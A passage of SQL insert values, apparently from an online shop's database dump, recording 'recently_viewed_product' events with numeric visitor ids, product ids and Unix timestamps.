(4414, 'recently_viewed_product', 5137, NULL, 2060, 1765151431),
(4415, 'recently_viewed_product', 5143, NULL, 2054, 1765165428),
(4417, 'recently_viewed_product', 5146, NULL, 2060, 1765177389),
(4418, 'recently_viewed_product', 5148, NULL, 2054, 1765185301),
(4422, 'recently_viewed_product', 5157, NULL, 2060, 1765210512),
(4424, 'recently_viewed_product', 5165, NULL, 2060, 1765237811),
(4426, 'recently_viewed_product', 5170, NULL, 2054, 1765255083),
(4429, 'recently_viewed_product', 5177, NULL, 2054, 1765269838),
(4430, 'recently_viewed_product', 5179, NULL, 2060, 1765285390),
(4432, 'recently_viewed_product', 5182, NULL, 2059, 1765287038),
(4433, 'recently_viewed_product', 5183, NULL, 2060, 1765287695),
(4435, 'recently_viewed_product', 5190, NULL, 2054, 1765238400),
(4440, 'recently_viewed_product', 5201, NULL, 2054, 1765325627),
(4441, 'recently_viewed_product', 5202, NULL, 2054, 1765328648),
(4442, 'recently_viewed_product', 5205, NULL, 2060, 1765333998),
(4444, 'recently_viewed_product', 5214, NULL, 2061, 1765324800),
(4445, 'recently_viewed_product', 5215, NULL, 2059, 1765324800),
(4446, 'recently_viewed_product', 5217, NULL, 2054, 1765364606),
(4447, 'recently_viewed_product', 5218, NULL, 2060, 1765364728),
(4448, 'recently_viewed_product', 5222, NULL, 2054, 1765372848),
(4451, 'recently_viewed_product', 5231, NULL, 2061, 1765324800),
(4452, 'recently_viewed_product', 5235, NULL, 2060, 1765400746),
(4453, 'recently_viewed_product', 5236, NULL, 2054, 1765404718),
(4456, 'recently_viewed_product', 5242, NULL, 2060, 1765432492),
(4457, 'recently_viewed_product', 5247, NULL, 2054, 1765441209),
(4458, 'recently_viewed_product', 5248, NULL, 2054, 1765442425),
(4460, 'recently_viewed_product', 5250, NULL, 2060, 1765443090),
(4462, 'recently_viewed_product', 5255, NULL, 2054, 1765453518),
(4463, 'recently_viewed_product', 5257, NULL, 2060, 1765464771),
(4465, 'recently_viewed_product', 5260, NULL, 2060, 1765476371),
(4467, 'recently_viewed_product', 5263, NULL, 2054, 1765483482),
(4468, 'recently_viewed_product', 5272, NULL, 2054, 1765506650),
(4470, 'recently_viewed_product', 5274, NULL, 2054, 1765497600),
(4473, 'recently_viewed_product', 5282, NULL, 2060, 1765536211),
(4474, 'recently_viewed_product', 5284, NULL, 2054, 1765540219),
(4476, 'recently_viewed_product', 5286, NULL, 2060, 1765541549),
(4478, 'recently_viewed_product', 5302, NULL, 2060, 1765609244),
(4479, 'recently_viewed_product', 5304, NULL, 2054, 1765611060),
(4482, 'recently_viewed_product', 5324, NULL, 2060, 1765682804),
(4483, 'recently_viewed_product', 5327, NULL, 2054, 1765685493),
(4484, 'recently_viewed_product', 5330, NULL, 2054, 1765709918),
(4486, 'recently_viewed_product', 5336, NULL, 2054, 1765735113),
(4488, 'recently_viewed_product', 5339, NULL, 2060, 1765740563),
(4489, 'recently_viewed_product', 5344, NULL, 2060, 1765758616),
(4490, 'recently_viewed_product', 5349, NULL, 2054, 1765782076),
(4492, 'recently_viewed_product', 5354, NULL, 2060, 1765794963),
(4495, 'recently_viewed_product', 5363, NULL, 2060, 1765827850),
(4496, 'recently_viewed_product', 5369, NULL, 2054, 1765843104),
(4498, 'recently_viewed_product', 5378, NULL, 2060, 1765880732),
(4499, 'recently_viewed_product', 5380, NULL, 2054, 1765886650),
(4500, 'recently_viewed_product', 5381, NULL, 2060, 1765887001),
(4502, 'recently_viewed_product', 5393, NULL, 2054, 1765939201),
(4503, 'recently_viewed_product', 5394, NULL, 2054, 1765939176),
(4504, 'recently_viewed_product', 5395, NULL, 2060, 1765942663),
(4508, 'recently_viewed_product', 5403, NULL, 2054, 1765963874),
(4509, 'recently_viewed_product', 5407, NULL, 2054, 1765992375),
(4511, 'recently_viewed_product', 5410, NULL, 2060, 1766011942),
(4512, 'recently_viewed_product', 5412, NULL, 2060, 1766013299),
(4513, 'recently_viewed_product', 5415, NULL, 2054, 1766020089),
(4514, 'recently_viewed_product', 5418, NULL, 2060, 1766035524),
(4515, 'recently_viewed_product', 5422, NULL, 2054, 1766055245),
(4517, 'recently_viewed_product', 5424, NULL, 2060, 1766060340),
(4518, 'recently_viewed_product', 5428, NULL, 2058, 1766016000),
(4520, 'recently_viewed_product', 5436, NULL, 2061, 1766016000),
(4521, 'recently_viewed_product', 5441, NULL, 2060, 1766115664),
(4522, 'recently_viewed_product', 5444, NULL, 2054, 1766118245),
(4524, 'recently_viewed_product', 5451, NULL, 2060, 1766142486),
(4525, 'recently_viewed_product', 5457, NULL, 2060, 1766163734),
(4526, 'recently_viewed_product', 5462, NULL, 2054, 1766190665),
(4528, 'recently_viewed_product', 5465, NULL, 2054, 1766191744),
(4529, 'recently_viewed_product', 5467, NULL, 2054, 1766188800),
(4530, 'recently_viewed_product', 5472, NULL, 2054, 1766219803),
(4532, 'recently_viewed_product', 5476, NULL, 2060, 1766234463),
(4533, 'recently_viewed_product', 5478, NULL, 2054, 1766188800),
(4534, 'recently_viewed_product', 5480, NULL, 2060, 1766243042),
(4536, 'recently_viewed_product', 5483, NULL, 2054, 1766251831),
(4537, 'recently_viewed_product', 5487, NULL, 2054, 1766262472),
(4539, 'recently_viewed_product', 5492, NULL, 2054, 1766188800),
(4541, 'recently_viewed_product', 5495, NULL, 2054, 1766292877),
(4543, 'recently_viewed_product', 5497, NULL, 2060, 1766296521),
(4544, 'recently_viewed_product', 5499, NULL, 2060, 1766300816),
(4545, 'recently_viewed_product', 5502, NULL, 2054, 1766275200),
(4546, 'recently_viewed_product', 5506, NULL, 2060, 1766337007),
(4547, 'recently_viewed_product', 5509, NULL, 2060, 1766340738),
(4550, 'recently_viewed_product', 5518, NULL, 2054, 1766359523),
(4551, 'recently_viewed_product', 5525, NULL, 2054, 1766390456),
(4552, 'recently_viewed_product', 5528, NULL, 2060, 1766397610),
(4554, 'recently_viewed_product', 5532, NULL, 2054, 1766361600),
(4555, 'recently_viewed_product', 5534, NULL, 2060, 1766416328),
(4557, 'recently_viewed_product', 5537, NULL, 2054, 1766422133),
(4559, 'recently_viewed_product', 5545, NULL, 2062, 1766446414),
(4560, 'recently_viewed_product', 5548, NULL, 2054, 1766464126),
(4561, 'recently_viewed_product', 5549, NULL, 2060, 1766466089),
(4562, 'recently_viewed_product', 5551, NULL, 2060, 1766469956),
(4564, 'recently_viewed_product', 5553, NULL, 2054, 1766478456),
(4565, 'recently_viewed_product', 5556, NULL, 2054, 1766489091),
(4566, 'recently_viewed_product', 5557, NULL, 2058, 1766493849),
(4568, 'recently_viewed_product', 5559, NULL, 2060, 1766503036),
(4570, 'recently_viewed_product', 5567, NULL, 2054, 1766448000),
(4572, 'recently_viewed_product', 5574, NULL, 2060, 1766576488),
(4573, 'recently_viewed_product', 5577, NULL, 2054, 1766580238),
(4574, 'recently_viewed_product', 5578, NULL, 2054, 1766534400),
(4575, 'recently_viewed_product', 5584, NULL, 2060, 1766606691),
(4576, 'recently_viewed_product', 5586, NULL, 2060, 1766619219),
(4578, 'recently_viewed_product', 5589, NULL, 2054, 1766620800),
(4579, 'recently_viewed_product', 5590, NULL, 2054, 1766631036),
(4581, 'recently_viewed_product', 5595, NULL, 2059, 1766620800),
(4582, 'recently_viewed_product', 5597, NULL, 2054, 1766620800),
(4583, 'recently_viewed_product', 5599, NULL, 2054, 1766662080),
(4584, 'recently_viewed_product', 5602, NULL, 2054, 1766673687),
(4586, 'recently_viewed_product', 5610, NULL, 2054, 1766718849),
(4588, 'recently_viewed_product', 5614, NULL, 2060, 1766728196),
(4590, 'recently_viewed_product', 5620, NULL, 2060, 1766743506),
(4591, 'recently_viewed_product', 5626, NULL, 2054, 1766761657),
(4592, 'recently_viewed_product', 5627, NULL, 2054, 1766764610),
(4593, 'recently_viewed_product', 5629, NULL, 2058, 1766707200),
(4594, 'recently_viewed_product', 5631, NULL, 2058, 1766773039),
(4595, 'recently_viewed_product', 5635, NULL, 2054, 1766707200),
(4596, 'recently_viewed_product', 5639, NULL, 2054, 1766803550),
(4597, 'recently_viewed_product', 5643, NULL, 2060, 1766821027),
(4599, 'recently_viewed_product', 5645, NULL, 2054, 1766793600),
(4601, 'recently_viewed_product', 5650, NULL, 2054, 1766838331),
(4602, 'recently_viewed_product', 5654, NULL, 2054, 1766854437),
(4607, 'recently_viewed_product', 5666, NULL, 2060, 1766885413),
(4609, 'recently_viewed_product', 5669, NULL, 2054, 1766880000),
(4611, 'recently_viewed_product', 5671, NULL, 2062, 1766880000),
(4612, 'recently_viewed_product', 5678, NULL, 2060, 1766929683),
(4615, 'recently_viewed_product', 5684, NULL, 2054, 1766943146),
(4618, 'recently_viewed_product', 5691, NULL, 2054, 1766880000),
(4619, 'recently_viewed_product', 5692, NULL, 2060, 1766969386),
(4620, 'recently_viewed_product', 5701, NULL, 2060, 1766998643),
(4621, 'recently_viewed_product', 5702, NULL, 2054, 1766999904),
(4622, 'recently_viewed_product', 5705, NULL, 2060, 1767032806),
(4623, 'recently_viewed_product', 5707, NULL, 2055, 1766966400),
(4624, 'recently_viewed_product', 5708, NULL, 2054, 1767046905),
(4625, 'recently_viewed_product', 5709, NULL, 2060, 1767048475),
(4626, 'recently_viewed_product', 5710, NULL, 2060, 1767048970),
(4628, 'recently_viewed_product', 5713, NULL, 2054, 1767052800),
(4629, 'recently_viewed_product', 5714, NULL, 2054, 1767056964),
(4630, 'recently_viewed_product', 5715, NULL, 2060, 1767058598),
(4633, 'recently_viewed_product', 5724, NULL, 2054, 1767088368),
(4635, 'recently_viewed_product', 5728, NULL, 2054, 1767110077),
(4636, 'recently_viewed_product', 5730, NULL, 2060, 1767052800),
(4637, 'recently_viewed_product', 5731, NULL, 2060, 1767111700),
(4639, 'recently_viewed_product', 5732, NULL, 2054, 1767116099),
(4640, 'recently_viewed_product', 5734, NULL, 2054, 1767121832),
(4641, 'recently_viewed_product', 5735, NULL, 2060, 1767124968),
(4642, 'recently_viewed_product', 5736, NULL, 2060, 1767136913),
(4643, 'recently_viewed_product', 5741, NULL, 2060, 1767173074),
(4644, 'recently_viewed_product', 5745, NULL, 2061, 1767139200),
(4645, 'recently_viewed_product', 5747, NULL, 2054, 1767187106),
(4646, 'recently_viewed_product', 5749, NULL, 2054, 1767139200),
(4647, 'recently_viewed_product', 5750, NULL, 2060, 1767193896),
(4649, 'recently_viewed_product', 5753, NULL, 2059, 1767139200),
(4651, 'recently_viewed_product', 5758, NULL, 2055, 1767239278),
(4652, 'recently_viewed_product', 5759, NULL, 2054, 1767225600),
(4653, 'recently_viewed_product', 5763, NULL, 2055, 1767225600),
(4654, 'recently_viewed_product', 5764, NULL, 2060, 1767225600),
(4655, 'recently_viewed_product', 5765, NULL, 2058, 1767225600),
(4656, 'recently_viewed_product', 5766, NULL, 2053, 1767225600),
(4658, 'recently_viewed_product', 5769, NULL, 2054, 1767225600),
(4662, 'recently_viewed_product', 5784, NULL, 2060, 1767324996),
(4663, 'recently_viewed_product', 5788, NULL, 2054, 1767349862),
(4665, 'recently_viewed_product', 5791, NULL, 2060, 1767357533),
(4666, 'recently_viewed_product', 5793, NULL, 2062, 1767312000),
(4667, 'recently_viewed_product', 5794, NULL, 2054, 1767312000),
(4668, 'recently_viewed_product', 5796, NULL, 2054, 1767362335),
(4670, 'recently_viewed_product', 5800, NULL, 2054, 1767379568),
(4671, 'recently_viewed_product', 5801, NULL, 2062, 1767380028),
(4672, 'recently_viewed_product', 5803, NULL, 2060, 1767381784),
(4674, 'recently_viewed_product', 5810, NULL, 2054, 1767397488),
(4675, 'recently_viewed_product', 5811, NULL, 2054, 1767398854),
(4677, 'recently_viewed_product', 5814, NULL, 2054, 1767398400),
(4678, 'recently_viewed_product', 5818, NULL, 2060, 1767442438),
(4680, 'recently_viewed_product', 5820, NULL, 2054, 1767443815),
(4681, 'recently_viewed_product', 5826, NULL, 2054, 1767398400),
(4682, 'recently_viewed_product', 5831, NULL, 2055, 1767398400),
(4684, 'recently_viewed_product', 5839, NULL, 2054, 1767484800),
(4685, 'recently_viewed_product', 5840, NULL, 2059, 1767484800),
(4686, 'recently_viewed_product', 5841, NULL, 2060, 1767548001),
(4687, 'recently_viewed_product', 5848, NULL, 2055, 1767571587),
(4689, 'recently_viewed_product', 5855, NULL, 2054, 1767571200),
(4690, 'recently_viewed_product', 5857, NULL, 2060, 1767617575),
(4691, 'recently_viewed_product', 5858, NULL, 2054, 1767618466),
(4693, 'recently_viewed_product', 5864, NULL, 2054, 1767649619),
(4694, 'recently_viewed_product', 5865, NULL, 2060, 1767651568),
(4695, 'recently_viewed_product', 5867, NULL, 2054, 1767656268),
(4696, 'recently_viewed_product', 5870, NULL, 2054, 1767657600),
(4698, 'recently_viewed_product', 5873, NULL, 2062, 1767657600),
(4699, 'recently_viewed_product', 5878, NULL, 2061, 1767657600),
(4700, 'recently_viewed_product', 5879, NULL, 2054, 1767723391),
(4702, 'recently_viewed_product', 5886, NULL, 2054, 1767744000),
(4703, 'recently_viewed_product', 5889, NULL, 2054, 1767755136),
(4708, 'recently_viewed_product', 5915, NULL, 2062, 1767876459),
(4710, 'recently_viewed_product', 5919, NULL, 2054, 1767898183),
(4711, 'recently_viewed_product', 5920, NULL, 2060, 1767898786),
(4713, 'recently_viewed_product', 5927, NULL, 2054, 1767932319),
(4714, 'recently_viewed_product', 5931, NULL, 2054, 1767952724),
(4715, 'recently_viewed_product', 5933, NULL, 2060, 1767965263),
(4716, 'recently_viewed_product', 5936, NULL, 2054, 1767982182),
(4719, 'recently_viewed_product', 5942, NULL, 2054, 1767997546),
(4721, 'recently_viewed_product', 5946, NULL, 2060, 1768014977),
(4722, 'recently_viewed_product', 5953, NULL, 2060, 1768039909),
(4725, 'recently_viewed_product', 5963, NULL, 2060, 1768088824),
(4726, 'recently_viewed_product', 5964, NULL, 2061, 1768089600),
(4729, 'recently_viewed_product', 5971, NULL, 2061, 1768124224),
(4730, 'recently_viewed_product', 5975, NULL, 2058, 1768134850),
(4731, 'recently_viewed_product', 5978, NULL, 2054, 1768139803),
(4732, 'recently_viewed_product', 5979, NULL, 2059, 1768141321),
(4733, 'recently_viewed_product', 5980, NULL, 2062, 1768142075),
(4734, 'recently_viewed_product', 5984, NULL, 2061, 1768089600),
(4736, 'recently_viewed_product', 5986, NULL, 2060, 1768164337),
(4737, 'recently_viewed_product', 5992, NULL, 2060, 1768184304),
(4741, 'recently_viewed_product', 5999, NULL, 2054, 1768176000),
(4742, 'recently_viewed_product', 6001, NULL, 2054, 1768210870),
(4743, 'recently_viewed_product', 6005, NULL, 2060, 1768220054),
(4744, 'recently_viewed_product', 6006, NULL, 2054, 1768221005),
(4745, 'recently_viewed_product', 6007, NULL, 2059, 1768176000),
(4748, 'recently_viewed_product', 6014, NULL, 2060, 1768251348),
(4750, 'recently_viewed_product', 6020, NULL, 2054, 1768276378),
(4754, 'recently_viewed_product', 6037, NULL, 2054, 1768327791),
(4757, 'recently_viewed_product', 6038, NULL, 2058, 1768335020),
(4761, 'recently_viewed_product', 6045, NULL, 2054, 1768355877),
(4764, 'recently_viewed_product', 6057, NULL, 2054, 1768404480),
(4771, 'recently_viewed_product', 6070, NULL, 2054, 1768435200),
(4773, 'recently_viewed_product', 6072, NULL, 2054, 1768470016),
(4774, 'recently_viewed_product', 6079, NULL, 2061, 1768497206),
(4777, 'recently_viewed_product', 6088, NULL, 2061, 1768533155),
(4779, 'recently_viewed_product', 6092, NULL, 2061, 1768547953),
(4782, 'recently_viewed_product', 6107, NULL, 2061, 1768619582),
(4785, 'recently_viewed_product', 6112, NULL, 2061, 1768631609),
(4786, 'recently_viewed_product', 6116, NULL, 2061, 1768665384),
(4789, 'recently_viewed_product', 6125, NULL, 2061, 1768684127),
(4791, 'recently_viewed_product', 6133, NULL, 2061, 1768714929),
(4795, 'recently_viewed_product', 6145, NULL, 2061, 1768759530),
(4798, 'recently_viewed_product', 6149, NULL, 2054, 1768766456),
(4800, 'recently_viewed_product', 6156, NULL, 2061, 1768793857),
(4801, 'recently_viewed_product', 6157, NULL, 2061, 1768794835),
(4806, 'recently_viewed_product', 6173, NULL, 2061, 1768845060),
(4811, 'recently_viewed_product', 6185, NULL, 2061, 1768881693),
(4812, 'recently_viewed_product', 6187, NULL, 2061, 1768902384),
(4816, 'recently_viewed_product', 6204, NULL, 2061, 1768960610),
(4817, 'recently_viewed_product', 6205, NULL, 2054, 1768953600),
(4820, 'recently_viewed_product', 6217, NULL, 2061, 1768953600),
(4821, 'recently_viewed_product', 6218, NULL, 2061, 1769016267),
(4829, 'recently_viewed_product', NULL, NULL, 2063, 1769031704),
(4830, 'recently_viewed_product', 6225, NULL, 2061, 1769031907),
(4836, 'recently_viewed_product', NULL, NULL, 2064, 1769035103),
(4837, 'recently_viewed_product', 6226, NULL, 2061, 1769040000),
(4838, 'recently_viewed_product', 6228, NULL, 2054, 1769046542),
(4839, 'recently_viewed_product', 6229, NULL, 2061, 1769047147),
(4840, 'recently_viewed_product', 6234, NULL, 2054, 1769072604),
(4841, 'recently_viewed_product', 6235, NULL, 2059, 1769079237),
(4842, 'recently_viewed_product', 6239, NULL, 2054, 1769084185),
(4843, 'recently_viewed_product', 6242, NULL, 2061, 1769093384),
(4844, 'recently_viewed_product', 6246, NULL, 2064, 1769110103),
(4845, 'recently_viewed_product', 6250, NULL, 2061, 1769125872),
(4846, 'recently_viewed_product', 6251, NULL, 2064, 1769133416),
(4847, 'recently_viewed_product', 6252, NULL, 2061, 1769139556),
(4848, 'recently_viewed_product', 6257, NULL, 2064, 1769157254),
(4849, 'recently_viewed_product', 6258, NULL, 2054, 1769157520),
(4850, 'recently_viewed_product', 6263, NULL, 2054, 1769179948),
(4851, 'recently_viewed_product', 6268, NULL, 2061, 1769206524),
(4852, 'recently_viewed_product', 6269, NULL, 2064, 1769208152),
(4853, 'recently_viewed_product', 6270, NULL, 2054, 1769211208),
(4854, 'recently_viewed_product', 6273, NULL, 2064, 1769212800),
(4855, 'recently_viewed_product', 6274, NULL, 2054, 1769223824),
(4856, 'recently_viewed_product', 6277, NULL, 2064, 1769243170),
(4857, 'recently_viewed_product', 6282, NULL, 2054, 1769271784),
(4858, 'recently_viewed_product', 6284, NULL, 2061, 1769272831),
(4859, 'recently_viewed_product', 6285, NULL, 2064, 1769274207),
(4860, 'recently_viewed_product', 6289, NULL, 2064, 1769286152),
(4861, 'recently_viewed_product', 6294, NULL, 2064, 1769296234),
(4862, 'recently_viewed_product', 6303, NULL, 2061, 1769330907),
(4863, 'recently_viewed_product', 6304, NULL, 2064, 1769335031),
(4864, 'recently_viewed_product', 6306, NULL, 2064, 1769338853),
(4865, 'recently_viewed_product', 6308, NULL, 2054, 1769350465),
(4866, 'recently_viewed_product', 6311, NULL, 2061, 1769361526),
(4867, 'recently_viewed_product', 6317, NULL, 2058, 1769299200),
(4868, 'recently_viewed_product', 6320, NULL, 2054, 1769391580),
(4869, 'recently_viewed_product', 6322, NULL, 2064, 1769395765),
(4870, 'recently_viewed_product', 6323, NULL, 2054, 1769397673),
(4871, 'recently_viewed_product', 6327, NULL, 2061, 1769415394),
(4872, 'recently_viewed_product', 6329, NULL, 2054, 1769385600),
(4873, 'recently_viewed_product', 6332, NULL, 2061, 1769427369),
(4874, 'recently_viewed_product', 6334, NULL, 2054, 1769385600),
(4875, 'recently_viewed_product', 6335, NULL, 2064, 1769428792),
(4876, 'recently_viewed_product', 6336, NULL, 2061, 1769430074),
(4877, 'recently_viewed_product', 6340, NULL, 2064, 1769455944),
(4878, 'recently_viewed_product', 6342, NULL, 2054, 1769468165),
(4879, 'recently_viewed_product', 6346, NULL, 2054, 1769485152),
(4880, 'recently_viewed_product', 6348, NULL, 2054, 1769491228),
(4881, 'recently_viewed_product', 6351, NULL, 2064, 1769472000),
(4882, 'recently_viewed_product', 6354, NULL, 2061, 1769504592),
(4883, 'recently_viewed_product', 6355, NULL, 2061, 1769504851),
(4884, 'recently_viewed_product', 6359, NULL, 2064, 1769514489),
(4885, 'recently_viewed_product', 6362, NULL, 2054, 1769524943),
(4886, 'recently_viewed_product', 6364, NULL, 2064, 1769536311),
(4887, 'recently_viewed_product', 6365, NULL, 2054, 1769541301),
(4888, 'recently_viewed_product', 6368, NULL, 2061, 1769557197),
(4889, 'recently_viewed_product', 6369, NULL, 2061, 1769560130),
(4890, 'recently_viewed_product', 6371, NULL, 2064, 1769570740),
(4891, 'recently_viewed_product', 6372, NULL, 2054, 1769571096),
(4892, 'recently_viewed_product', 6375, NULL, 2064, 1769578517),
(4893, 'recently_viewed_product', 6376, NULL, 2061, 1769578615),
(4894, 'recently_viewed_product', 6381, NULL, 2055, 1769558400),
(4895, 'recently_viewed_product', 6385, NULL, 2054, 1769616798),
(4896, 'recently_viewed_product', 6386, NULL, 2061, 1769618311),
(4897, 'recently_viewed_product', 6388, NULL, 2054, 1769628030),
(4898, 'recently_viewed_product', 6394, NULL, 2061, 1769642033),
(4899, 'recently_viewed_product', 6401, NULL, 2064, 1769644800),
(4900, 'recently_viewed_product', 6403, NULL, 2061, 1769684335),
(4901, 'recently_viewed_product', 6405, NULL, 2054, 1769689194),
(4902, 'recently_viewed_product', 6406, NULL, 2064, 1769690439),
(4903, 'recently_viewed_product', 6407, NULL, 2064, 1769693690),
(4904, 'recently_viewed_product', 6409, NULL, 2061, 1769701139),
(4905, 'recently_viewed_product', 6416, NULL, 2054, 1769738094),
(4906, 'recently_viewed_product', 6425, NULL, 2054, 1769772341),
(4907, 'recently_viewed_product', 6426, NULL, 2064, 1769774670),
(4908, 'recently_viewed_product', 6427, NULL, 2061, 1769775180),
(4909, 'recently_viewed_product', 6430, NULL, 2061, 1769786871),
(4910, 'recently_viewed_product', 6433, NULL, 2064, 1769804949),
(4911, 'recently_viewed_product', 6438, NULL, 2064, 1769829606),
(4912, 'recently_viewed_product', 6441, NULL, 2054, 1769836265),
(4913, 'recently_viewed_product', 6445, NULL, 2061, 1769848228),
(4914, 'recently_viewed_product', 6446, NULL, 2061, 1769849795),
(4915, 'recently_viewed_product', 6449, NULL, 2054, 1769858883),
(4916, 'recently_viewed_product', 6452, NULL, 2061, 1769870331),
(4917, 'recently_viewed_product', 6453, NULL, 2064, 1769873855),
(4918, 'recently_viewed_product', 6454, NULL, 2064, 1769877633),
(4919, 'recently_viewed_product', 6456, NULL, 2061, 1769817600),
(4920, 'recently_viewed_product', 6457, NULL, 2064, 1769884077),
(4921, 'recently_viewed_product', 6458, NULL, 2054, 1769884290),
(4922, 'recently_viewed_product', 6460, NULL, 2054, 1769899693),
(4923, 'recently_viewed_product', 6464, NULL, 2061, 1769904789),
(4924, 'recently_viewed_product', 6467, NULL, 2064, 1769924572),
(4925, 'recently_viewed_product', 6468, NULL, 2054, 1769929064),
(4926, 'recently_viewed_product', 6473, NULL, 2061, 1769940343),
(4927, 'recently_viewed_product', 6475, NULL, 2064, 1769949131),
(4928, 'recently_viewed_product', 6476, NULL, 2054, 1769957735),
(4929, 'recently_viewed_product', 6479, NULL, 2064, 1769960721),
(4930, 'recently_viewed_product', 6480, NULL, 2054, 1769966295),
(4931, 'recently_viewed_product', 6481, NULL, 2061, 1769967082),
(4932, 'recently_viewed_product', 6486, NULL, 2058, 1769904000),
(4933, 'recently_viewed_product', 6489, NULL, 2061, 1769995232),
(4934, 'recently_viewed_product', 6491, NULL, 2064, 1770003626),
(4935, 'recently_viewed_product', 6493, NULL, 2061, 1770008901),
(4936, 'recently_viewed_product', 6494, NULL, 2054, 1770009206),
(4937, 'recently_viewed_product', 6495, NULL, 2064, 1770009631),
(4938, 'recently_viewed_product', 6496, NULL, 2054, 1769990400),
(4939, 'recently_viewed_product', 6500, NULL, 2059, 1769990400),
(4940, 'recently_viewed_product', 6507, NULL, 2064, 1770047205),
(4941, 'recently_viewed_product', 6508, NULL, 2061, 1770052522),
(4942, 'recently_viewed_product', 6511, NULL, 2064, 1770055641),
(4943, 'recently_viewed_product', 6512, NULL, 2054, 1770055683),
(4944, 'recently_viewed_product', 6513, NULL, 2054, 1770058413),
(4945, 'recently_viewed_product', 6515, NULL, 2064, 1770063216),
(4946, 'recently_viewed_product', 6519, NULL, 2054, 1770077910),
(4947, 'recently_viewed_product', 6520, NULL, 2054, 1770076800),
(4948, 'recently_viewed_product', 6524, NULL, 2064, 1770098319),
(4949, 'recently_viewed_product', 6525, NULL, 2054, 1770102472),
(4950, 'recently_viewed_product', 6529, NULL, 2064, 1770076800),
(4951, 'recently_viewed_product', 6532, NULL, 2064, 1770133915),
(4952, 'recently_viewed_product', 6535, NULL, 2064, 1770136610),
(4953, 'recently_viewed_product', 6536, NULL, 2054, 1770138119),
(4954, 'recently_viewed_product', 6537, NULL, 2061, 1770139292),
(4955, 'recently_viewed_product', 6538, NULL, 2064, 1770141429),
(4956, 'recently_viewed_product', 6540, NULL, 2054, 1770151869),
(4957, 'recently_viewed_product', 6541, NULL, 2064, 1770152675),
(4958, 'recently_viewed_product', 6542, NULL, 2061, 1770076800),
(4959, 'recently_viewed_product', 6548, NULL, 2054, 1770163200),
(4960, 'recently_viewed_product', 6549, NULL, 2054, 1770183426),
(4961, 'recently_viewed_product', 6553, NULL, 2060, 1770163200),
(4962, 'recently_viewed_product', 6555, NULL, 2061, 1770196864),
(4963, 'recently_viewed_product', 6557, NULL, 2064, 1770205921),
(4964, 'recently_viewed_product', 6558, NULL, 2054, 1770206096),
(4965, 'recently_viewed_product', 6563, NULL, 2054, 1770163200),
(4966, 'recently_viewed_product', 6564, NULL, 2054, 1770226870),
(4967, 'recently_viewed_product', 6577, NULL, 2054, 1770276064),
(4968, 'recently_viewed_product', 6586, NULL, 2054, 1770303273),
(4969, 'recently_viewed_product', 6595, NULL, 2061, 1770339534),
(4970, 'recently_viewed_product', 6597, NULL, 2064, 1770343702),
(4971, 'recently_viewed_product', 6600, NULL, 2054, 1770356892),
(4972, 'recently_viewed_product', 6607, NULL, 2061, 1770385301),
(4973, 'recently_viewed_product', 6615, NULL, 2064, 1770414670),
(4974, 'recently_viewed_product', 6621, NULL, 2054, 1770434544),
(4975, 'recently_viewed_product', 6626, NULL, 2063, 1770422400),
(4976, 'recently_viewed_product', 6627, NULL, 2061, 1770457532),
(4977, 'recently_viewed_product', 6629, NULL, 2064, 1770458698),
(4978, 'recently_viewed_product', 6631, NULL, 2054, 1770461493),
(4979, 'recently_viewed_product', 6632, NULL, 2061, 1770464998),
(4980, 'recently_viewed_product', 6638, NULL, 2054, 1770496342),
(4981, 'recently_viewed_product', 6644, NULL, 2061, 1770516941),
(4982, 'recently_viewed_product', 6646, NULL, 2064, 1770508800),
(4983, 'recently_viewed_product', 6647, NULL, 2064, 1770525391),
(4984, 'recently_viewed_product', 6650, NULL, 2053, 1770533351),
(4985, 'recently_viewed_product', 6653, NULL, 2064, 1770541218),
(4986, 'recently_viewed_product', 6658, NULL, 2054, 1770568852),
(4987, 'recently_viewed_product', 6659, NULL, 2064, 1770569965),
(4988, 'recently_viewed_product', 6661, NULL, 2054, 1770572951),
(4989, 'recently_viewed_product', 6666, NULL, 2053, 1770587657),
(4990, 'recently_viewed_product', 6668, NULL, 2061, 1770593773),
(4991, 'recently_viewed_product', 6670, NULL, 2064, 1770600262),
(4992, 'recently_viewed_product', 6679, NULL, 2061, 1770646431),
(4993, 'recently_viewed_product', 6680, NULL, 2060, 1770646864),
(4994, 'recently_viewed_product', 6685, NULL, 2064, 1770666486),
(4995, 'recently_viewed_product', 6688, NULL, 2064, 1770670473),
(4996, 'recently_viewed_product', 6690, NULL, 2058, 1770675274),
(4997, 'recently_viewed_product', 6699, NULL, 2060, 1770705893),
(4998, 'recently_viewed_product', 6703, NULL, 2064, 1770715709),
(4999, 'recently_viewed_product', 6705, NULL, 2060, 1770718915),
(5000, 'recently_viewed_product', 6716, NULL, 2064, 1770758706),
(5001, 'recently_viewed_product', 6721, NULL, 2061, 1770775278),
(5002, 'recently_viewed_product', 6725, NULL, 2061, 1770792970),
(5003, 'recently_viewed_product', 6731, NULL, 2061, 1770814946),
(5004, 'recently_viewed_product', 6736, NULL, 2061, 1770826334),
(5005, 'recently_viewed_product', 6739, NULL, 2060, 1770840679),
(5006, 'recently_viewed_product', 6742, NULL, 2061, 1770852574),
(5007, 'recently_viewed_product', 6751, NULL, 2060, 1770885129),
(5008, 'recently_viewed_product', 6754, NULL, 2064, 1770887617),
(5009, 'recently_viewed_product', 6758, NULL, 2064, 1770854400),
(5010, 'recently_viewed_product', 6760, NULL, 2061, 1770904045),
(5011, 'recently_viewed_product', 6761, NULL, 2061, 1770906112),
(5012, 'recently_viewed_product', 6767, NULL, 2064, 1770920259),
(5013, 'recently_viewed_product', 6775, NULL, 2064, 1770951814),
(5014, 'recently_viewed_product', 6783, NULL, 2054, 1770976735),
(5015, 'recently_viewed_product', 6784, NULL, 2060, 1770979687),
(5016, 'recently_viewed_product', 6786, NULL, 2061, 1770981743),
(5017, 'recently_viewed_product', 6792, NULL, 2064, 1771010331),
(5018, 'recently_viewed_product', 6799, NULL, 2061, 1771032663),
(5019, 'recently_viewed_product', 6806, NULL, 2061, 1771027200),
(5020, 'recently_viewed_product', 6810, NULL, 2060, 1771071076),
(5021, 'recently_viewed_product', 6811, NULL, 2060, 1771079797),
(5022, 'recently_viewed_product', 6816, NULL, 2053, 1771096506),
(5023, 'recently_viewed_product', 6817, NULL, 2061, 1771099328),
(5024, 'recently_viewed_product', 6818, NULL, 2061, 1771100796),
(5025, 'recently_viewed_product', 6820, NULL, 2059, 1771027200),
(5026, 'recently_viewed_product', 6824, NULL, 2059, 1771127345),
(5027, 'recently_viewed_product', 6828, NULL, 2061, 1771140729),
(5028, 'recently_viewed_product', 6835, NULL, 2060, 1771164239),
(5029, 'recently_viewed_product', 6837, NULL, 2060, 1771167952),
